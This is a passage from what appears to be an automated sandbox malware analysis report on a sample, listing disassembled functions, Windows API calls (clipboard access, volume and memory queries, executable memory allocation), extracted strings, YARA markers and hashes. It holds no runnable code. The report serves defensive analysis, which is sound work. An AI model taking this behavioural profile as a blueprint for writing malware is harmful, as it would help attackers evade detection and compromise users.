                                              • Instruction Fuzzy Hash: 98F139B0204B928AE725CF35D0647E7BBE1BF16309F44896DC0EB8B282DB7D6549CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00423596 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 380COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004236FE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: InstalledMemoryPhysicallySystem
                                              • String ID: -7.4$MR R
                                              • API String ID: 3960555810-942721988
                                              • Opcode ID: 763129677535d4a72a604066d148867399aeb3608e40668b7624e40a6f656fa5
                                              • Instruction ID: 2fa671b28a049078f4dd0d03d5744d44717cea9c832a25525f32d7520d8a97d6
                                              • Opcode Fuzzy Hash: 763129677535d4a72a604066d148867399aeb3608e40668b7624e40a6f656fa5
                                              • Instruction Fuzzy Hash: 43E14AB0204B528AE725CF35D4647E7BBE1BF16309F44896DC0EB8B382DB7D65098B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004341A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: >=$G1F7
                                              • API String ID: 1029625771-3563142761
                                              • Opcode ID: d282417f180fcb37d25bbaa060342a80c76658950f6c0418d30f9346f6b724dd
                                              • Instruction ID: 14da80cf22acf3b89c99242e8ca6be0b19683f6df11c328d6f7ee38423698bc4
                                              • Opcode Fuzzy Hash: d282417f180fcb37d25bbaa060342a80c76658950f6c0418d30f9346f6b724dd
                                              • Instruction Fuzzy Hash: A54108742083419BD718CF00D99475FBBE1BFC9B58F148A1CE8955B381D378D90A9B9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004090B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • How to Talk to Your Cat About Gun Safety. Do you love your cat? Well, no self-respecting cat mom or dad would let their baby grow up without a solid grounding in gun safety., xrefs: 004090F3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: How to Talk to Your Cat About Gun Safety. Do you love your cat? Well, no self-respecting cat mom or dad would let their baby grow up without a solid grounding in gun safety.
                                              • API String ID: 621844428-3219661580
                                              • Opcode ID: 29dfed9965a319fe24048995b90e2def5f861019178d281272e2979116696abc
                                              • Instruction ID: 1624d7f5e89d02a9961bc28c365e007a4165c690b29712144a0b90f16931b4fd
                                              • Opcode Fuzzy Hash: 29dfed9965a319fe24048995b90e2def5f861019178d281272e2979116696abc
                                              • Instruction Fuzzy Hash: 5501F970A0C202E6D6103B76590F27A7A98AE51358F10053FE9827A2D3E67C4C1793AF
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004306D2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00430707
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: InformationVolume
                                              • String ID: \
                                              • API String ID: 2039140958-2967466578
                                              • Opcode ID: 85cd59c97f6bf9b5c0b9df7c107cb441f9e4dbc72515e3f52d986a405ecfa20c
                                              • Instruction ID: 669ce7c395f7719595b6c1e41dfd85534ccdbd0b1e6287d7c188649188475883
                                              • Opcode Fuzzy Hash: 85cd59c97f6bf9b5c0b9df7c107cb441f9e4dbc72515e3f52d986a405ecfa20c
                                              • Instruction Fuzzy Hash: 8AE0D8B4780701BFE328CF10EC17F1A32A59B56708F21842DB352E51D0D7B0B5158E4D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,006E0223,?,?), ref: 006E0E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,006E0223,?,?), ref: 006E0E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: 5910df1618b4d58ae791dba76823746767ea92d9917d6bbb5d2ec6216bae3b2e
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: 4AD0123114522877D7002A95DC09BCD7B1CDF05B62F008421FB0DD9180C7B0994046E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00434EAA Relevance: 1.6, APIs: 1, Instructions: 90memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 00434F42
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 8766dd349803b0aadd33b5bff09709d5c2c416b32e9d35dc4ba9c8f4b06ff8cd
                                              • Instruction ID: 9080a20ae45bcd27f959725e669f5616208f8f1387f58d0cde705380d5325144
                                              • Opcode Fuzzy Hash: 8766dd349803b0aadd33b5bff09709d5c2c416b32e9d35dc4ba9c8f4b06ff8cd
                                              • Instruction Fuzzy Hash: 39315A352047408FD708CB19D8A175AB7E7FBCA308F59592DE896C7391DB74D8058B85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00432120 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004321B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: d458b643132478d644b961611ba8fef4bf81086d996713c2458425bbb86b2864
                                              • Instruction ID: 92c4e559d7fdf9a385e00d3618763a18d143ea68be6cee5cca90d72daa594498
                                              • Opcode Fuzzy Hash: d458b643132478d644b961611ba8fef4bf81086d996713c2458425bbb86b2864
                                              • Instruction Fuzzy Hash: CA011370108381AFE304CF14D5A472BBBE1EBC5328F208A0DE8A907791C779D909CBCA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00432220 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlFreeHeap.NTDLL(?,00000000), ref: 004322AD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: 11dc267cecbb66a9f442fa07742978905afb724dec188e6b4b9367b2927edd7b
                                              • Instruction ID: 690fc5bc2595e82f503e5c74ecb3b1a2912e957d418eaafec1a9f36fab02054a
                                              • Opcode Fuzzy Hash: 11dc267cecbb66a9f442fa07742978905afb724dec188e6b4b9367b2927edd7b
                                              • Instruction Fuzzy Hash: 4E111C755026419FD7258F18C994B46BB62EB85328F34CA9EC4691B696C376E407CFC0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00435AE5 Relevance: 1.5, APIs: 1, Instructions: 12memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00435AF3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 8d0c6da2411a7cb7b8c2da46d3b71a69a4c51ae348ecbca2b3e79ce87589a106
                                              • Instruction ID: 4966d1c77637cc2c4b68332eedbb01f38c9df5c10605bfeb59e33d42c67c15c2
                                              • Opcode Fuzzy Hash: 8d0c6da2411a7cb7b8c2da46d3b71a69a4c51ae348ecbca2b3e79ce87589a106
                                              • Instruction Fuzzy Hash: 56C01275600105AFDA108F40EC45A9AB725F785211F100575F50482454D330A8A6CAE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007E0185 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007E01D6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 007DF000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7df000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: 3f552d6d29c595f277ed74092c07389877f35b388b14bfeeb542141edfb87861
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 1B113279A00248EFDB01DF99C985E98BBF5AF08350F158094F9489B361D375EA90DF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 006E9E27 Relevance: 11.7, Strings: 9, Instructions: 455COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0$CpMN$E{$H$KDLG$NM$p){/$pC$s@KD
                                              • API String ID: 0-4175016407
                                              • Opcode ID: 5af8d17ef4e7fed4b8fc704a4b1e6647c81ab426705f32852f0354aac2e89cf3
                                              • Instruction ID: fef1747474a7e7982242e48d7d82ece4769b8e681e27744606833bf58869b501
                                              • Opcode Fuzzy Hash: 5af8d17ef4e7fed4b8fc704a4b1e6647c81ab426705f32852f0354aac2e89cf3
                                              • Instruction Fuzzy Hash: 2C1210B02093819BE318CF15C494BAFBBE2BBC5308F545D1DE4968B282D779D909CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0042AFE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115clipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                              • String ID:
                                              • API String ID: 1006321803-3916222277
                                              • Opcode ID: bf7ba8f77189af705f82aa8c9bb68d6745b2dcbf3e68b876b289dd77a3488e34
                                              • Instruction ID: f4c19b65ddc9955578d64893f0c40d4310a5dafcf5dcc80618631c40f4c3c9e8
                                              • Opcode Fuzzy Hash: bf7ba8f77189af705f82aa8c9bb68d6745b2dcbf3e68b876b289dd77a3488e34
                                              • Instruction Fuzzy Hash: E1416C7150C391CBC3119B28948866FBFE0EB963A4F840A5EF8E157292C3389959CBD7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0070425A Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 834COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: fcWP
                                              • API String ID: 0-3943274717
                                              • Opcode ID: 3f8e106154555794e3fd6ccfeb84a526ec2386f5bb77e902e8e63e97f90a2772
                                              • Instruction ID: abc5aa138683d3d9df63c945dbd2d20fc7c0d52466c98eb01a499e42cbef2fbf
                                              • Opcode Fuzzy Hash: 3f8e106154555794e3fd6ccfeb84a526ec2386f5bb77e902e8e63e97f90a2772
                                              • Instruction Fuzzy Hash: 4352CBB0204B41CFD735CF29C4947A2BBE1BF56304F148A6DD6EA8BAD2D739A409CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00423FF3 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 834COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fcWP
                                              • API String ID: 0-3943274717
                                              • Opcode ID: 3f8e106154555794e3fd6ccfeb84a526ec2386f5bb77e902e8e63e97f90a2772
                                              • Instruction ID: 9bcaecc95164b6e2b4aaddea902a6dfa901d177a8534c75ecc8350c67aaef8e5
                                              • Opcode Fuzzy Hash: 3f8e106154555794e3fd6ccfeb84a526ec2386f5bb77e902e8e63e97f90a2772
                                              • Instruction Fuzzy Hash: 0D52CC70204B518BD335CF29D4907A3BBE1FF96304F548A6ED4EA8B792D738A409CB59
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00713007 Relevance: 9.4, APIs: 6, Instructions: 402nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00100000,00003000,00000004), ref: 0071305E
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000000,00003000,00000040), ref: 00713167
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 007131C3
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00100000,000000B8,00008000), ref: 00713217
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00100000,00000000,?,00003000,00000004), ref: 0071323E
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00100000,?,00008000), ref: 0071355F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8d8faa2bfe266e6b8e188ecac92af4557114240aab7445a7e033f63275cb08ea
                                              • Instruction ID: fc02f6b4a10e8239fa11b4922086563ecef5e6ed671f02cd33d4d5384b5e4263
                                              • Opcode Fuzzy Hash: 8d8faa2bfe266e6b8e188ecac92af4557114240aab7445a7e033f63275cb08ea
                                              • Instruction Fuzzy Hash: CDE168711083819FD715CF28C880B6ABBE1BF89314F148A2DF5A5872D1D779EA49CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00432DA0 Relevance: 9.4, APIs: 6, Instructions: 402nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00100000,00003000,00000004), ref: 00432DF7
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000000,00003000,00000040), ref: 00432F00
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00432F5C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00100000,000000B8,00008000), ref: 00432FB0
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00100000,00000000,?,00003000,00000004), ref: 00432FD7
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00100000,?,00008000), ref: 004332F8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: db5b1baf8f4c17b7056ca8a224d2de8d7ed5a272556f6fd533d7efa3e6180373
                                              • Instruction ID: 6901e04b5bfed640b9808015ee33ac261d83c230db4e7679f3eb9058c464b57b
                                              • Opcode Fuzzy Hash: db5b1baf8f4c17b7056ca8a224d2de8d7ed5a272556f6fd533d7efa3e6180373
                                              • Instruction Fuzzy Hash: 40E178711083419FD714CF18C880B2BBBE1BB89318F148A2EF5A487391D779E909CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00717FD7 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 334nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00718083
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,?,00008000), ref: 007180E1
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 007181A2
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,?,00008000), ref: 007181FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: R-,T
                                              • API String ID: 292159236-635581381
                                              • Opcode ID: 63e7bc82cdb27067edc03b88e9deee4d14116444a1c5f864d62040e01fd9d2a2
                                              • Instruction ID: 627832f6d710a451b5fb767bd5cfe6a99672676dd44ee3fed0623b05a887b944
                                              • Opcode Fuzzy Hash: 63e7bc82cdb27067edc03b88e9deee4d14116444a1c5f864d62040e01fd9d2a2
                                              • Instruction Fuzzy Hash: 8DC1DE716083118FC714CF18C880A5EFBE1FF88718F19862CE8A59B3A1DB78D945CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00437D70 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 334nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00437E1C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,?,00008000), ref: 00437E7A
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 00437F3B
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,?,00008000), ref: 00437F98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: R-,T
                                              • API String ID: 292159236-635581381
                                              • Opcode ID: c903464bdb493d5a38677b7f4801326b45717ed32c9b10d950e2fa214c2649b8
                                              • Instruction ID: 3dd0099d7a10fb4040d1ab2e05897a9660030bd435626c55e0cd4113b078addf
                                              • Opcode Fuzzy Hash: c903464bdb493d5a38677b7f4801326b45717ed32c9b10d950e2fa214c2649b8
                                              • Instruction Fuzzy Hash: F8C1BF716083119FC714CF18C880A1BF7E1EF98318F198A2DF9959B3A1DB78D905CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FBCA3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FBD45
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006FBDA0
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FBFE5
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006FC040
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: 01
                                              • API String ID: 292159236-3477152822
                                              • Opcode ID: 5b7f9c4f8180f5ebea96daf370ee695ebd2cc2de3fcf7e05343775afda963dee
                                              • Instruction ID: 95b4c88d5bc010d7edbabac85c5c32fb3d281e16f1180f0d40352898b5a9dece
                                              • Opcode Fuzzy Hash: 5b7f9c4f8180f5ebea96daf370ee695ebd2cc2de3fcf7e05343775afda963dee
                                              • Instruction Fuzzy Hash: 43D112B01083869FD724CF04C894B9FBBE1BB86348F148D2CE5E99B391D77599098F96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041BA3C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041BADE
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041BB39
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041BD7E
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041BDD9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: 01
                                              • API String ID: 292159236-3477152822
                                              • Opcode ID: fed2dc28b6cbed2a1ab562f7af2b107bbc30e3a60bc6d271f81b13037ac1232c
                                              • Instruction ID: 664c0559d8076d972d5a56e374875a1de3e0a82fa573013157e44d364f674d6d
                                              • Opcode Fuzzy Hash: fed2dc28b6cbed2a1ab562f7af2b107bbc30e3a60bc6d271f81b13037ac1232c
                                              • Instruction Fuzzy Hash: 3BD123B01083829FD724CF04C894B9FBBE1FB85348F148D2DE5E98B391D77999498B96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00717077 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 142nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 007171CC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0071723E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: ,$@
                                              • API String ID: 292159236-1227015840
                                              • Opcode ID: ac3439721b39ca0e062e45c23e4720c439a7e4d0abd7daa180adecded1292a4d
                                              • Instruction ID: e5c55f7bff962cba1f368c126c4a31fc866c575e820cc71d38d6dacd95a3f7de
                                              • Opcode Fuzzy Hash: ac3439721b39ca0e062e45c23e4720c439a7e4d0abd7daa180adecded1292a4d
                                              • Instruction Fuzzy Hash: F6416CB11087049FD710DF18C845B5ABBF4FF85368F148A1CF5A89B2E0E7799948CB56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F652E Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: or]`$ql$uuMx$v|vs$~t~{
                                              • API String ID: 0-1582885218
                                              • Opcode ID: 868f65a298393c092045ad6b5e740a7d41dfa7cf2d3ed0caf4700d7c882c0fbc
                                              • Instruction ID: 7978ef47a0727b200c9dcb864821d2858674370588c0b8e011aae5bebeb44bd6
                                              • Opcode Fuzzy Hash: 868f65a298393c092045ad6b5e740a7d41dfa7cf2d3ed0caf4700d7c882c0fbc
                                              • Instruction Fuzzy Hash: D271BFB15083818FD724CF28C491B6ABBE2AFD6308F584A2DF5A58B392D735D805CB53
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FF237 Relevance: 6.4, APIs: 4, Instructions: 379nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FF2E2
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FF339
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FF3F8
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000010,00008000), ref: 006FF44B
                                              Memory Dump Source
